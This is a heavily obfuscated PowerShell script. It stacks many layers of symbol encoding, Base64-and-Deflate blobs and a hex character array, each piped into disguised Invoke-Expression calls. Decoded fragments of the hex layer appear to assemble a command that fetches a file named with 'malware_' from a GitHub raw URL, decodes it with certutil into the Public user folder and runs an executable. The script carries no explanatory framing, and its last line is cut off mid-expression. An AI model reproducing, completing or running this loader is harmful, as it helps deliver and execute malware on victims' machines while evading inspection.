${@'}${+}${+@.}  +  ${@'}${+}${+@.}+  ${@'}${ .$}${ .$}${ %=}+${@'}${ .$}${ .$}${.``}  +${@'}${ .$}${[!``}${ .$}  +${@'}${ .$}${ .$}${%}+  ${@'}${ .$}${ .$}${.``}+  ${@'}${+}${+@.}  +  ${@'}${+}${+@.}  +  ${@'}${ .$}${ .$}${+@.}+  ${@'}${ .$}${ .$}${ %=}  +${@'}${+}${);*}+${@'}${ .$}${[!``}${);*}+${@'}${ .$}${[!``}${.``}  +  ${@'}${+}${+}+  ${@'}${+}${+@.}+  ${@'}${+}${+@.}+  ${@'}${+}${ %=}  +${@'}${'-}${+@.}  +${@'}${+}${+}  +${@'}${.``}${);*}  +${@'}${+}${+@.}+${@'}${+}${+@.}  +${@'}${ .$}${ .$}${ %=}  +  ${@'}${ .$}${ .$}${.``}+${@'}${ .$}${[!``}${ .$}  +  ${@'}${ .$}${ .$}${%}+  ${@'}${ .$}${ .$}${.``}  +${@'}${+}${+@.}  +${@'}${+}${+@.}+${@'}${ .$}${ .$}${+@.}  +${@'}${ .$}${ .$}${ %=}+${@'}${+}${);*}  +${@'}${ .$}${[!``}${);*}  +${@'}${ .$}${[!``}${.``}  +  ${@'}${+}${+}+${@'}${+}${+@.}  +${@'}${+}${+@.}  +${@'}${+}${ %=}  +${@'}${%}${#*}  +${@'}${ .$}${[!``}${ .$}+${@'}${ .$}${+@.}${[!``}+  ${@'}${ .$}${[!``}${ .$}  |  ${)}  ") 
. ( $sHelLiD[1]+$SheLLID[13]+'x') (NeW-OBjEcT  System.Io.COmPResSIOn.dEflATeSTreAm( [io.mEmoryStrEAM][syStem.ConvErt]::frOMBASE64sTrINg('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0u81b16dvbj4/qNH36mK5dbHH4/SrfTje3uz/U+/fW/vF+/vPOJ/f/HD3d/94N5Xu7ufnhzsffXg3rPd3Z3f/cHus4f3Zvc+LQ8+/d0/ffjtg73f/dNP3z54ODu4N/v04e9+sPNod3f/27s7u7/4wc6Mfrw92Cs/fXiCNz998Is/ffhof5fAPtt/+Iv398v7u189vPft/Xu/+72H397d26Efb/fvv93d+fR3390lAPd+Mb32FX2Hz3cf7e8Qcs/2d/C/ew9PHj48oX/37z2ib6kjQm7/rftg99Py3sPfff8etSl3dx/gAwZPqD/8xbs793/33Z2DZ/f20PP+vW+j6f1fLO32T+grgv67P3xQPnz4aHdnnwDO9u/94nsPn1E/hIO0JRC7e2g746+pEcG8T2h8+hV3BOzu7X1FA2KsCOWvdnf2vrq39xYgQVTu+yt8vvspfUBf7N4nMCX39bvfP3i2/+AttwHO+w9oHPuPHj749u4u/fVpubtzj/5/nz79VCESvgf4wfQCDGBJGO7+7piTh0Tj3V3qY0df2aW/aY52P31mOvn2/qdvH4JeuzR1QvZ7PPgH6AmfETk+pcl88LsDVdCUsMDfmOBHmGQGRf8+e/gA7WcPHxC1H3wFTkCvPCclpntn/y1Pw+59RoFHgD52dwhjYooHRJhnTB5C89MZv0j/PgIk8wcR7j7AEqHoJWIJEIfxoi6+Mh3RYGj4+w8eCT7U1QG99PCrhxjFPqG3Wz5UutO/v/jhwVf39x/d3/s2f4L+HzJaz3gaT8AFxJwPDzAdJRj9IVD9Nn9FQ6Judu8LBzAHforZBXf/YkZrjzjr7f2DrzCjGALh/eAX7+NFsI0wLFHrgXDvI/RJE8ISAea8DxZEz4TRfRrbg999X+dk54GQ5St+hZoRTXf36P8PCNdfDJbmr98ykvcfYZq555m+LRT+3UE3hkiUKu8TD+wRR4BGNPxHPCSIyO8OLgfDCRufyFiFR0ge9k72aRZ2dn53EB8yxAzFf74l8SFOvE+MSqTaB2hMrgghk48pw3z/8BH3STjNlAIz/gDSQcP/xYzxTMQfc/wVT/7Og28L2GdCnt9d3t0Dm84eHjCGhOlbZi8Q5SHAP/jdeRgzTPpDmerfnTXFpzOBaGjCr6EZyTZP5Vvphibt018sTTFfkMNHhmMwcVCG0I3cA8iFGcS7v9iwAk3Gt7W/mcAD2iDzV6bTtw8PqAlod5+mRbjsK9ZLD0rpFyg8En4icbCDIsmGJJwQH0IhMC9gLkg9gXKsJA52vnrwKWm92acPTj4F7UsBi5Ezv+6/fUjcDtj7bz+9/4sP9sgSPLr/4NF9UsnQiyf7BHjv43GzKos3Wx//4kfPfvfZt9+elF99nN5Jf+bZl69Os5Nv/+J063sn3z5+9f3vnS3ffP93+/3vpL8kvXPnZ37hFn3+Gmbp8+//bpf5qydfvj59+Sp/dvrq9MX09M73dkf3vv/Jx7/3x9s/TRbr44/v/D8=' ) , [io.COMPResSioN.cOMPResSIonmodE]::DecOMpress)|fOreAcH {NeW-OBjEcT IO.sTREAMREADeR( $_ , [TExT.eNCODIng]::ASCii)}).rEAdtOeND()
(New-obJeCt  sysTeM.Io.CoMPreSSiON.DEflATestreAM([sySTem.iO.memoRysTReaM][sYsTEm.cONvErt]::fRombASE64StrInG('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0vFW+rutmvmXX+Tf29v9/ie/2+r1vKLf7+1//5OPf++P76Rb2z9dnb343vTbWf29739/K713kI72d0bpvb10dO/T0e4u/Ty4N0of0M/d3V36Z+fh6NOHo4e7o/T+DrV9OEof3hvt30Nzakqv7u7eT0cP9kYPHqJxqq3v44W9EbVN9++N7tHn6e4eAUj5132CjC7T/R3u/x698xCd7QLePhrvApsH+hteYjD05859/HNA79Pr99FoxK/gsxRQtAugiF8ePpCPd3f29TuCJG2oP21kWwOq98lo/z4IgW72uFv+0HwpuDB+PMwUPwUvhr4nQL1vCAkztk/xC2gA8PcPpInFY/+B/kNjwxjwC77HWzu20T0dERAhiKmBjyEf8C8WA6CLcWDIQuKH+GSX/r+j2Ag1LLr0hZI/lU8ZEnViXtwRRA1RPZLs8ES5GbwvgIDfPXT/wEDXYQh2O2ZU3CGPGV14bTCZuzsMcweYfxoSGKNnVP3ZuS+jczgaVqDvU+4VFFWKK5K7Hfr6Q+CGlkwMR9is04zJmfL0gUY6FA8ov+H3IyxM84zvwq8EkoX6kLp5eKBoaIP7+JpEjr/0J31HRTmVN+xUpSo2/qzzQDwWT4XcPK59HhV41xNkgzkPGSJNzJESN1Ob0QMazf19hSbN6NP0wQEQ3Q+ZQ9lSeuIOtFkqLzkgKSB4I1dYIkkPmCygI88u8/ie8JUZEL1ML1h+MGjZ7ngm72Oy9lgpOQbz8FRKpE5FSX+sIawK2N3ZEfoCDzsl/ALzBn2dGmbzlERXiZF2QGtDFAxXfg/mTSgqHM9QdYimR1BSaC1Tw2P1gAa8IeoOg3uIXlI3gxigpa153wLTOU+Fjfak1f0QUWUCbefm2nRjp1SVl6fmzNBcU49rDODUsY1i5rgDatEMYSTMIb0H3Gzet0wosrqPWd7VfozckC3DN2QL92D60gPIxgP6+1PC9dMH2tAYuof0+6fQYYbRDphGUD+EwH2Cu48eQSs0TaXtyLREw/s01Pufeo0+ZUWJRsABwO7T/9i6cs/7sMdCul3Bk40oZoAV30MaNey7wYvhCFb3IQo7DIlnU+32nfRO+v8A'), [sYStEm.IO.coMPreSSIon.ComprEssIonMode]::DeComPrEsS)|% {New-obJeCt  SYStEm.io.sTREAMREader($_ ,[SYStem.Text.EnCODING]::ascii ) } |% { $_.READToEND( ) } ) | & ( $ENv:cOMsPec[4,26,25]-jOin'')
&( $EnV:ComSPEc[4,15,25]-joiN'')(New-ObJecT  IO.StreamREADer((New-ObJecT  Io.comPrEssiON.deFlaTEstReAM([Io.MemORYSTreAm] [convERT]::FROmbAsE64sTrINg('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ifmG6lf5uzbfzsjybfW/3+5/g9+fPC/r93vc/+fjdx3fSrY9+t6309Wm7XbSnX6QfX2avzo6fPD99VD1rPk4//ji989En6feaN6/OXlx8/3vT+XH9ve9/P93a30lH+P+9h6P04UP6QX/eG6X4me7u7Kaj3d39FH+PUvpcPt79NO003H3AH8v38jFevz/a3TlIpdH+PQVzb096M2/v39c/BajC2pdXHwKtB4za7g4hwigRCGp/XwF7b95nXPbQ9QHa3seHhNWeQYExoA6pgcOCgdzjt/ZlGDJEbsuwCcqeHYbX1/2D0f6DlP/PbS05CNOHD/g3dAGAOxg+Y+TTT36ajh+MHh7wT4avYwUpMPrdXfr/jgzIjJtR29nt0CHldgGynyqC+jEG9/ChP4l4iXvb0Y8NYTA2IeQO+nJ9274eCDG8OZYxGqYRAu7c05EJdvovE6lDiodEOiUnI7/zwMz6Q9OBhe+xFWioM36fvxe6Kvboj5HQuUrNe6bhro8ut7dTtQ+GBF0YXUcz5QJ/QuwgdmXiDCUFVR49A/KBPMT4Dnq8rIwPKKmjRmpIoW0FAg0YnHN/330lre8L29oPHhqh8WdKpmMXzCfCLn085JlXXtwXoaB/9naULJBj5iKSAvqYSGtE3WmKvfvylaWtdM6jlSFpI29uLf93YFlp8D7XGdi7B6D4xfzlT3FqEfPxCjAS+eae/alhqoYqTHG5L78Ysj70FACPGN8dCD7uCyFSyGjcBBN9n1WjarpdMxNEcqtc0WtqWcXTpz4/WcXoSwbUBsEUNZJ6n9wL1JpRCu7V+xg6TyDh7Y84mFmjV820KsyUx5Yq/oz7rrEn4bxZRnGYS2eWWDzX3IjVO0A+ZBXvo8UUesjYKTcqBjofirbfgyigPZBG2dibudQiqO9xR4aqyqZMTp0vjNJRM3xbqahvG7UoDBLC3QMgy4ncTseaCg/AKFqymNF2B8u9Ynj7RsFBdHnSAXd3xHzyYGf0kCblU2r3YE+M1gF+3hvdp1/vQzXs70LWARiixwxzINK/z1+z+mDz9qlRzAB9QN1+ii4O6N0H94TJnTx9+lBg8DgA9IFoR1FG+6P9PfkK7MojeHCg8NCQFezD3dF9+rFPhN9/qP8HbzHWD5kKMKKfjh48ZMIpEJBOSL57J/2EnKaGfKazN/mCfKbjV8XxhHymL9lnSsmr+ujO/wM=' ), [sYSTEm.Io.coMPrESSion.coMprESSIONMODe]::dEcoMPRess)),[syStEm.TExT.eNCODing]::ascII)).READtoend()
& ( ([stRinG]$veRboSepreFereNCe)[1,3]+'x'-joiN'')( New-OBject  System.IO.STREAMREaDeR(( New-OBject iO.cOmpRESSION.dEFlATESTrEAM([systEM.io.memOrYSTREAm] [CONvert]::frOmBaSE64sTrING('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivve6fVUsL77/6NFPV8WLrfTjj9NR+r3pt4/r733/+1vpvQP6897eKN3fGdGPe5+mo4N7owd7o08f0he7O/j6waf0/3vp6NODUfpwNx3t46uH9MH+PXoB7anh/ij99OGIXuC3Rmi/u7OTyhvp/sNRen93hJdSeiu9R3/v7lGXD0f7u9Rxygik+gtB3uE2D9FsZ3e0u7sPbHY/xT8PCDJ+u/eQMUC73Z37gq2O5T6aPEDjfaBxwP0Qsoz4Q3k11Q8ePsBnKZrQR6l8yePxPqEPaBiC3n2Cjf/vjZg83DchxHRMtfOdPVBTIYz4/X3bSjo3PdFQCBYP7z4R6UCwlIHhlwfyfyHBwwfcEGA/BcoKiX/Z3eGJuM+AR+Zj6ZO7B+1GD4EyaKj0k4Fz3zxG6eghA9zdFRhKqd3dHQtOWu4ofCBjXsG3ijghM5I/dnc+NRRWUA+YiqmdSUsnDAL4eR2bnnZ4sgSi/IY+du3sCjI61h2ZJ0duSw0LWaYZLaUHQxFlgXs6CswQBizT/ql+uvNQsNk10++Rz45IiGxHY77hIWAuRV52PZZknnmIXvd5bD6bpw+pr4f0xn3q4z7xzMP7PrfwKHTaqJUKDWOl1OIxoP2nPCqhm6K0B2E1HGp6BBNjYu+Da/bos/0DnkdHpT2WvD1ogwMzxe47N9GWJZVO7m+QTOkIQAwn5XdNhwJIZOQBD431kk8ZTKJwoLykiIUzKlgycKVJgO99vC8jDiZTed4oHuFqDHZvBGH32Zo1npIc7LiLj/gTUR5QPveBnGCCgTni+djqV7si7yKcOqPesOUbvK9DNpANBUE0AcJyz2QTFWGI5WkRgaykCwAJs2IEPjMExHM0lzk0tJUZZoi7hv9Umvb1z2DWvT/1rT1mooeCuihcRsNjOqPIhFV8dvR0CH1DU75vhJmsj0dKRUqHArFTO5I+2JGRkyEjEwdSPtgTehzwp/T6fXx6f4ff5H/upHfSnxlvpVvfa968Kl5cfP93+8nTV0+q5nT1Kn+W1/mLk9M73yOW+P4nH7/7eBuG+eOP7/w/') ,[iO.cOmpResSiON.COMPRessiOnmoDE]::dECoMPRESS) ) , [text.eNCodiNg]::aScii) ).READtoend()
(NeW-obJect  iO.cOMPrEssion.deFlaTeSTrEam([io.memorySTREAM] [COnvERt]::FROmbASE64StRIng( '7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivve6fXW2vPj+o0ffqYrlVvrxx6PvnXw7q7/3/e+nW/f20lG6v0P/3Hs4Sh8+TEf36P/79+RnuruzO9rd3bcfcqvd3U/lF9ds9wE1+zQd7e7cx0sH9P0efX+fPn2QAgK+OkhHD9HJA3rJQEvRqf7iOtjZp+a7KUNhIPj/nny7f28kbQ7wD774dKTNdvbwBrpCf/Q54ySYyku7ewBGgO4f8Bf0ufb9YET/SxlTYLi7i7cIws497oYH+SmjpuNNHx7IL4wd0QkvY4BCK+1v1xCUcd/d3RE42l7+oq8/ZToA6V2gjzce6GgZT8VgB799Kgik3HEwDwzLvQVI9/DpAx2rUpz6TbX3hxgzupNfHuiUeyinhoaWVJgdN2HSjdDnvrIDj15mQAnm8Q9DuM+kcLgLpjQLqXaonHefX/H4kanlkE6ljX2FeW0EMNyAZxJ8h+n04DyUfpjLRg/vjx5Sk/s0qvt7dgSK60PwM6HKE0Mzri8xaEMWHZOZMIPpfZlWZT+lPE39nlCfv9sT9gc3pp9SV/fvcy/B78pjISMrv2lHaO9N0X0ZEX2aAoxPZwB0WLJQAT73QxLF8guMPg1Yi6Gk9l0dFcADyRSdMUnvE5X3IOU6gRbFT4WuZrJ3oQJ8MpsJFC4/8IYKEtm/8AormB1DDWUenhAjcPy1cMM9VRqGbk48hVCmJ0VDKBZ+xPRjXOUbDNajtRBBPnZTpXpT2dNJCyAYsoWzIjPO8yZa6oHModVzoWZRRBWsTLrOBEEyrANVyyyGoZrhyZepz2QOlpF5UWtWpMxADEcxwgpLFeEevybQDNLCCkoiXzXgnYDMFpphTgHLXOUNk0RKOMvnTZIoxVT0zC5r7gOa+k/pzwP68sGnwp+fGgXHJo/nwtFN+9kXoA/3zAcMF3Kyt8+G5lP5kyGg0admxoheD5gKu9A+3Hn6cBdaZfSQtRsPVpoDD6YotOkD6u/BA2YaeoGIhS73Mfx7SgwMEaPfvZPe+ZnxVvq7rV5/+8vF6ff2v/8J/TqvFvn37u18/5OPf++P7/w/') , [Io.CompRessiON.coMPReSsIOnMOdE]::deCOmPReSs) |FOReach{NeW-obJect  io.sTReaMrEAder($_ , [TeXt.ENcoDiNg]::ASCii)} ).REAdTOEnd( )| .((VARiABle '*mDr*').namE[3,11,2]-Join'')
. ( $PSHOMe[21]+$PsHoME[30]+'X')( nEW-obJect IO.cOmPrESsiOn.DefLatEsTReam( [sYsteM.io.MemorYstReam] [SYSTeM.CONVert]::fRomBAse64stRiNg('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8itn+6Kl6kWx/v7zze3/mpew9/6uHD57s7u9e7u/v0/0/f7u4+wM/r3Z37z+49fLx/7929h693dw4e39t7tn//HX39mppm9x4+27+HBvTVu4cPrx8+ePwQ7fYB7Kfv7T3ev0+g7lPbPTT5aYAjsD997+Hb/Xv07/W9vdf0L4P/qf379MlP79+jT6jh3rt7eGf/Lb5BHxm9iJcfE7AMQO8f/PT+g+t9ILr/mnre3aWWn/7U7s69d9TPc2qa0fs/TbhmDw9+in4AFQK5Sx1kDJLa7BPaBHWX/r/z3Iz0LXe1s0sgd+j9T98RWBodNSOCPCSMXjOWP7X/AD1RL0D4UxolkLj/U4zkzj1C8sFPc9vnGNHuDn2wQ6893793TR8/xMsP3z18QD2h3TOmyFsQTii/D+oDZ5qfd4zXOx0TjRE03aHG994SARhvGQ96Bt40UBrD/gNqimlhbAGfQNzHzL5mUsus7tKH+0RLmrSHzx4CnOBMiB1Q24fPzcuEM+HDk/uYG+H9h/dfPzx4a2f0/v71/b239CEjRa8ShJ2fAoUfHjwDz9DLz3jsD2ic94m0jOnu3g7QekaT/vBhdv/g7e7evZ/aP3i+u0cj3bv30/v4BNR4oBS5Vqbg0e5jxO8YhwxD2iOy8As/xXR9jnHv3Xtn4DEDPXgOhDDCnfvvwLXcgBAh1uFff4p+JdJd33/4U/doRFZAftrABDc+F1Ggyd9BZ8RXP4V5YEl5t0+k3tmhoe4S+9BoCdWdHRA8Y4pSy5/m8cqLb0G9g4w6f71/IPRFV4TFT2NAhuA0stf8GXd8H1hh/q759717mSDOAiU8s3fvsYyLXtkDBV/zAOi7nyYK8O9gD8I5g9yA0ffuXcsrj4WUP62kuLd3TdjeP8DHz5grX1uEnslbGZqK+riPkWN2MGX4WifgmnF7LROVGWSeyYw9N/qAqLsHQD/1EHrjADxPuP2U9PIYwzF8imE/1/l++CDb/1S0D75lFtnb0Q+y/V2ayox12OsHO/TLc1JAD3dF++0/+/T+64O9dw/v/fT9B9n9nWfUendv//m9A3rp+T6aZ/dIv+weZJ8SHjSshzTa3d3nB/eefcro4sPHn4Ip6VcZesbf7Lz+9AG1IWZ/frCfPXiIiXt3sP/8YO85VOIDMCKx+871/u7bh7uv94k++z99n+Tk3jPhCxoDK0qQ9NN3D6Bw7z9/cACNhY93P95uXj4/a9OPrz/efv2yxG8/xb8V9Nsz+m31/OxN+vE7arcqizcfv+YX6Jfs45Q/aj/+afPR24/1k8eA8BwQnn+c/szv/ou3vncyP371/e8VL958P/3dfv876S+5k/5Mkf/e/w8=' ) ,[Io.coMPrESSIOn.coMPresSiONMoDe]::decompress) | %{nEW-obJect io.STreAMreADer($_, [tExt.eNcODINg]::aScIi) } ).rEADtOend( )
( nEW-obJeCt SYsTEM.Io.stREAMreADeR((nEW-obJeCt  IO.cOMPReSsIOn.dEFlaTeStREAM( [iO.memorYStReAm] [cOnverT]::fRombASe64sTRINg('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0l+YbqW/W/Pt0+fl2dPv7X7/E/o9f/68mH1v9973P/n49/74ztZHv9vW69M328Wb/Is0/fgnj1+dZU+enz6qzl9/nH788Z2PPvne6zd18eLi+1sEan9nxP+/93D08GE62t3ZpX9299NRurv76egefZTu30vpF3zwQD7Gvzv3qe3B6N7eaP8+3niAb/YB4IC+Bqj04QP+DbDT0f49Aba7sy+dBKAJDH7gT2Cyfx/Q+J89fudAPr4nsKhzxS81/e+gHf1B4IHNpwInlTcM0n4XAM2dpKP7wHifkMX/ZewPeTho/imA3+MB2z49MNyf4saoESF0ZBjRw4ORoRpGg3GDTCN+QYb+kHGRL3YMfaWlASSD3t3BwEb7nyqpuB8mtEdfhbTzUAbDsxTOwO7OpxYyY6BzZ4aH0eIj9BcMjJBjsgCe/MID29nVZkoQQR+TzHxx337CjXlOdyzOhoj3lPafOiJxy091UnYeMqpm0MDuvrzrceenlql4WEAMtKap7QJg1gRXYY4fGtblsTwEXJq2+/TifTDVQw9l5UAzYdSMe+CuPJIwbsw5Biczienunp3je3sGJqPGMwlW3N0DWfYBe08G6XPBHpGKG8l8PRAS27HqPFIrQKBWI/09VXAsUXiPkQcJME8PBTeDpemNQHhSJO/vyaRxKzMFBleQ9X5H4DFM5nHCUTQEzzJjztPNCENroCVL/g7TCJMBfhKG3uFBuikQsCq8Binp1ENIyGUoyaLIFArU3H3TTFsp8Xr0EpYRJmZd6ebCvqVclhqCMV+QXrKzG5DOoK69WQ71kLAjdhP4wBsqsA8hmqGNzMBSH0fpK5g+ZhLRs6DPQyaoGagbp2BoYAg2POGqI2l2hbet6trf5VmSaaXPHuwIN0BPP9xlrnhAf37KAka8+5Ag3wfA+4Czvyuv7u7ts84jRU8f4//pwadGaAkoRvGpCK0g7nBQAUv3YReYBQmDA3y6b2QP7URSd4DIAwL7KYjzcHd0f3e0T13jffwfvHJ/R7BMeTysSR/QIOiTBywp3Nlueif9md/9F6db35t++/jV99PvFcs3309/t9//TvpL0juffJT+bltpk7fbZzDPH19mdXE8KfNHX543ZJ3Tj++kH6V30v8H' ) ,[IO.COmPRESSiON.cOMpreSSIOnMoDe]::DEComPRess) ), [teXt.ENcODiNg]::aSCiI)).ReAdtoEND()| &((VaRIABLe '*MDR*').NaME[3,11,2]-Join'')
( nEw-ObJECt  sYsTEM.io.StREaMrEADer( ( nEw-ObJECt SYsTeM.Io.COmpReSsIOn.DeFLATesTReaM( [IO.MEMORYstrEAm][CoNverT]::frOmbase64StrING('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0i36795eOkr3d/D/dHTv4ejhw9Huzu5od3c/pX8+HaW7uw/wz6fUbHfnPn15MKKXRvv38f0Dfifdvyc/+S1qdkD/PnxI/9CH+A4/H1JbfHYPn8sLBGFnH+130YQRoQ52GfIevjwYcZfonLukP/fwq3kRXwBJab57f3QfPe8/4H8wBuoVzbjLT7nH/XuMDXUKvABewRBADPXhAY+LoQn6iuiuGZ75EEPEZ7sj+UTA7u4o2XhQ9KdguA/6gba7uwD2UDDkV5RAgk1qPgNQaSdYG3rJjPBozQTt3DNElZ/6PRDZ6byfYhZShuvNm34o/2LuZbL3FSOQwn6W8pTIwJSITGozZMZL+cX0LEN6oJ+YASseipJ5zXDfCFB3gJvPMcxc9PVDobmBqCD2uYlODs/YQ4KKGb1PY7m/h7/tnGB6ZLL30WeKnpgGGO6+MBag7u3ob/fwPgG+f4BP7ykBdXCE1B5RiT6mX3XgMmN7zEdmCtzsjQyH7MufPi9wB2kAFr97g9vjgewpSytzQFIxJCaSctNDxkGApQZaCizp91Sm/j6z2Z62Th2vOwXgI6fywhNGHRnJ3FHqayMCItCY0vS1Dhhk9OkhJNVhK98rGZV2pql8zHMizMKyDUIowkJHQy1tZcduZERlzVCwK4OYnoCIjv9SwTeAKnCEpIFyUzSZwPcwUZ4Q4p/7MhI7Uv3Lw3xXBUMH6EkTf74v3xpsLBhLppBdeKyi4XhsPML7Okc+GoqF0gj477NU8gc7dp4YDSAmY8bXsAkPWOWArMRPD3dF56cP9hjQAfMYvXuf2W5nhNd29yC3e9wNXiRjBHqxBAqP0fefqugL5g/uCb895F6pA4LJ1GWJ5beox0/piweitjBRUFufHuAleSe9D+x4Hh1T7Cidd++kP5P+7r843fpe8eLN93+33387e51+b/rt7NX37/yS9M72d74slh9//DPpL9xKf7dV8+0vF6ff29v9/ie/28vm29Ui/969ne9/8vHv/fGd/wc=') , [Io.ComprESSion.coMpreSSiONmode]::DeCOMprESs ) ),[teXT.eNCODinG]::ASCII)).READTOeNd( ) |. ( ([StriNg]$verboSEprEFERenCe)[1,3]+'x'-JoIn'')
(( 20 ,26,28 , 28 ,76,61, 72, 49 , 41, 42 , '4c',65, 20 ,27,'2a', '6d' ,64, 72, '2a' ,27 , 29,'2e' ,'4e',61, '4d' , 65 , '5b' , 33 , '2c',31 , 31 ,'2c', 32 ,'5d', '2d','6a' ,'6f' ,49, '6e',27, 27, 29, 20, 28, 20 , 28,28, 28,22 ,'7b',32 , 37 , '7d', '7b', 37 ,'7d', '7b' , 32,35,'7d' ,'7b' , 34,30 , '7d', '7b' , 34, 32, '7d' ,'7b', 32 , 31 , '7d', '7b',33 ,37 , '7d' ,'7b' , 32 ,30 , '7d' ,'7b', 36 , '7d' , '7b',31,32, '7d', '7b',31 , 30 , '7d' , '7b',30 , '7d', '7b' , 31 , 36 , '7d','7b' , 34 ,31 , '7d','7b', 32 , 39, '7d' ,'7b',33 ,33 ,'7d', '7b' , 31 , 37 , '7d' ,'7b', 31 ,39,'7d', '7b', 33 , 34 , '7d','7b' , 32 ,34, '7d' ,'7b', 31 , 34 , '7d' , '7b' , 33 , '7d', '7b', 31 , 35 ,'7d','7b', 33, 31 ,'7d' ,'7b',33 , 30 ,'7d' ,'7b', 31 , 33,'7d', '7b' , 34,'7d', '7b' , 33,38 ,'7d','7b' ,33,35 , '7d', '7b',31, '7d', '7b',31 ,38,'7d','7b' , 39 ,'7d' ,'7b',32 ,33,'7d','7b',33 ,36, '7d', '7b' ,35,'7d' , '7b' ,32 ,36 ,'7d', '7b', 32, 32 , '7d', '7b',38 ,'7d' ,'7b',33,39 , '7d', '7b' ,32 ,38 ,'7d', '7b',32, '7d', '7b' ,33, 32,'7d', '7b',31 ,31,'7d' ,22, 20 , '2d' , 66,20 , 27,73 , 74 , 27,'2c', 27 ,'6f', 64 ,65 , 20 , 63,'3a' ,66,54, 41, 66, 54 , 41,75 ,73, 27,'2c',27,41 ,61, 27 ,'2c', 27 ,75, 73 , 65,27,'2c', 27, 61,'3b',20 ,63 ,27,'2c',27 , 70 ,75, 62 , '6c', 69 ,63 ,66, 54, 41 , 66,54 , 41,61,20 ,63 ,'3a' ,66, 54 ,41 , 66, 54 , 41 ,75 ,27, '2c' ,27,73,65,72 , 63 ,'6f' , '6e',74,65 ,'6e',74 ,'2e', 63 , '6f' , '6d', '2f' , 27 , '2c' ,27,'6c', 20,'2d' , 75 ,72 , 27 , '2c', 27 ,66, 54 , 41,27 ,'2c' , 27 ,72,73, 66 , 27 , '2c' , 27 ,74, 68 , 69 ,27,'2c' , 27 , 65 ,78, 65,27 , '2c',27, 69 , '6d','6a', 75 ,73 ,74,67,75 ,'6e' ,'6e' , 61,'6d' ,61 , '6b',65 , 27,'2c' ,27, 41 ,66,54, 41,27 , '2c' , 27 , 63 ,'3a', 66 ,54 ,41,66 ,54 ,41 ,27, '2c', 27, 72 , 73 , 66,54,41 , 66, 54, 41, 27,'2c' ,27 ,68, 69,'6e',67 , '2f',74 ,65,27, '2c' ,27 , 62,27,'2c',27 ,65,27 ,'2c',27, 36,34 , '5f', '6e', '6f' , 62 , 27, '2c' , 27 , 74 , 68, 75 ,62 ,75,27,'2c', 27 ,'2f' ,'2f' ,72 , 61,77,27 , '2c', 27 ,54 ,41 , 70 , 75 ,62 ,'6c', 69 , 63,27 ,'2c',27 , 54 , 27,'2c' ,27,61, '6b' ,73,'2e',74 ,78 ,74 ,20, 27 , '2c', 27 , '6c' ,63 ,61, 27 ,'2c',27,73, 65 , 72 , 73, 66,54, 41, 66 ,27,'2c' , 27, 63,65,72,74,75,74 ,69 , 27 ,'2c' ,27,54 ,27,'2c' , 27 , '6d' , 61 , 73 ,74, 65 , 27 , '2c' ,27, 54, 27, '2c', 27,70,75, 62,'6c' ,69 , 63, 66,27 , '2c' , 27 , '2e',27, '2c' , 27,72,'2f','6d',61, '6c' ,77,61, 72 ,65 , '5f' , 27,'2c' ,27 , 72, 65 , 27,'2c',27 , '6c' ,20 , '2d' ,64 , 65, 63, 27 ,'2c',27, 41,66 ,54 ,41, 27, '2c' , 27, '2e',67 , 69,27 , '2c' ,27 ,65 ,72,74,75, 74, 69,27, '2c', 27 , 66 ,27 , '2c' ,27,63 , 68, 65 , 20 ,'2d',73 , 70 , '6c' ,69 ,74, 20 , 27 ,'2c',27 ,73 , 74, '2f',27 , '2c' ,27, '2d',66, 20 , 68 , 74, 74, 70 , 73 , '3a' ,27 , 29 ,29,20,'2d',43 , 72 , 65,50 , '6c',41,43 ,45, 27 ,66 ,54 , 41, 27,'2c','5b',63 ,68,41 , 52, '5d' ,39, 32, 29,20 ,29 , 20) | %{ ( [chAr] ([conVeRt]::ToinT16( ($_.TOsTrING()) ,16) ))} ) -Join''|INVokE-eXpRessiON
INvOkE-exPressIon ( "$(sv 'oFS' '')" + 